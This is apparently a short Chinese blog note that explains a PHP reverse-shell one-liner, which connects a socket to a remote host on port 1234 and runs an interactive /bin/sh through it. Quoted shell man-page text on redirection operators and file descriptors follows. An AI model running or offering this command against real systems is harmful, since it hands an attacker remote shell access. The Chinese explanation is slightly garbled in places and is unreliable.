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2015-02-10 22:14 344 查看

php -r '$sock=fsockopen("",1234);exec("/bin/sh -i <&3 >&3 2>&3");'



-i interactive Force the shell to behave interactively.

文件描述符,内核(kernel)利用文件描述符(file descriptor)来访问文件。文件描述符是非负整数。打开现存文件或新建文件时,内核会返回一个文件描述符。

0       stdin

1       stdout

2       stderr

Control operators:

& && ( ) ; ;; | || <newline>

Redirection operators:

< > >| << >> <& >& <<-  <>

> file   Redirect standard output (or n) to file.      

>| file  Same, but override the -C option.         

>> file  Append standard output (or n) to file.         

< file   Redirect standard input (or n) from file.         

[n1]<&n2    Duplicate standard input (or n1) from file descriptor


<&-      Close standard input (or n).         

[n1]>&n2    Duplicate standard output (or n1) to n2.

>&-      Close standard output (or n).  

<> file  Open file for reading and writing on standard input (or


Background Commands -- &

If a command is terminated by the control operator ampersand (&), the

     shell executes the command asynchronously -- that is, the shell does not

    wait for the command to finish before executing the next command.

“&&” and “||” are AND-OR list operators.


创建一个连接到 的socket ,得其文件描述符 3。

执行 /bin/sh -i 得到一个交互式的shell

<&3 重定向用户输入的命令到shell

>&3 2>&3 将stdin 和 stderr 重定向到socket

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